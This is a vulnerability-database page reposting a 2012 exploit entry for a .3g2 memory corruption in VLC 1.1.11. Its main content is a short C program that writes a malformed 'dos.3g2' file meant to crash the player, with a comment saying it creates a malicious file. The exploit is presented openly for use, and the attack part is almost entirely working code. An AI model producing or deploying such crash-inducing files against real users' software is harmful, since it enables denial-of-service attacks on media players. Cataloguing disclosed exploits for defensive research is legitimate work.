Lucene search
K

VLC v. 1.1.11 .3g2 Memory Corruption

🗓️ 09 Mar 2012 00:00:00Reported by Dan FoscoType 
zdt
 zdt
🔗 0day.today👁 13 Views

VLC v. 1.1.11 .3g2 Memory Corruption exploi

Code
# Exploit Title: VLC v. 1.1.11 .3g2 Memory Corruption
# Date: 3/9/2012
# Author: Dan Fosco
# Vendor or Software Link: www.videolan.org
# Version: 1.1.11
# Category:: local
# Google dork: n/a
# Tested on: Windows XP SP3 (64-bit)
# Demo site: n/a

#include <stdio.h>
#include <string.h>

int main()
{
	FILE *f;
	f = fopen("dos.3g2", "w");
	fputc('\x00', f);
	fputc('\x00', f);
	fputc('\x00', f);
	fputc('\x00', f);
	fputs("\x66\x74\x79\x70", f);
	fclose(f);
	return 0;
}

//use code for creating malicious file



#  0day.today [2018-03-20]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

09 Mar 2012 00:00Current
6.8Medium risk
Vulners AI Score6.8
13